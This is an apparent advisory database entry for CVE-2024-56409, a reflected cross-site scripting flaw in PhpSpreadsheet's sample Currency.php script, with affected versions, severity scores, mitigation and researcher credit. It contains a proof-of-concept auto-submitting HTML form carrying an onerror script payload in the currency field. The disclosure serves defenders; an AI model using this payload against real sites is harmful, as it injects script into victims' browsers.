CVE-2024-56409 – phpoffice/phpspreadsheet
Package
Manager: composer
Name: phpoffice/phpspreadsheet
Vulnerable Version: >=3.0.0 <3.7.0 || >=0 <1.29.7 || >=2.0.0 <2.1.6 || >=2.2.0 <2.3.5
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L
EPSS: 0.0009 pctl0.26559
Details
PhpSpreadsheet allows unauthorized Reflected XSS in Currency.php file # Unauthorized Reflected XSS in `Currency.php` file **Product**: Phpspreadsheet **Version**: version 3.6.0 **CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') **CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N) **CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L) **Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` script, an attacker can perform XSS-type attack **Impact**: executing arbitrary JavaScript code in the browser **Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file **Exploitation conditions**: an unauthorized user **Mitigation**: sanitization of the `currency` variable **Researcher**: Aleksey Solovev (Positive Technologies) # Research The researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Currency.php` file) in Phpspreadsheet. There is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php` file, which leads to the possibility of a XSS attack. Strings are formed using the `currency` parameter without sanitization, controlled by an attacker.  *Figure 9. A fragment of the query in which a string and a parameter are formed without sanitization* An attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario. *Listing 5. HTML form that demonstrates the exploitation of the XSS vulnerability* ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://192.***.***.***/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Currency.php" method="POST"> <input type="hidden" name="number" value="1234.5678" /> <input type="hidden" name="currency" value="$'"<img src=1 onerror=alert()>" /> <input type="hidden" name="decimals" value="2" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="spacing" value="0" /> <input type="hidden" name="submit" value="Display Mask" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` After sending the script provided in Listing 5, the XSS vulnerability is exploited. Figure 10 shows the execution of arbitrary JavaScript code during the submission of a POST form. <img width="428" alt="fig10" src="https://github.com/user-attachments/assets/2be8c94b-03ac-40d9-aa7a-9d326eb79335" /> *Figure 10. Executing arbitrary JavaScript code* # Credit This vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**
Metadata
Created: 2025-01-03T17:06:51Z
Modified: 2025-03-06T18:18:55Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-j2xg-cjcx-4677/GHSA-j2xg-cjcx-4677.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-j2xg-cjcx-4677
Finding: F008
Auto approve: 1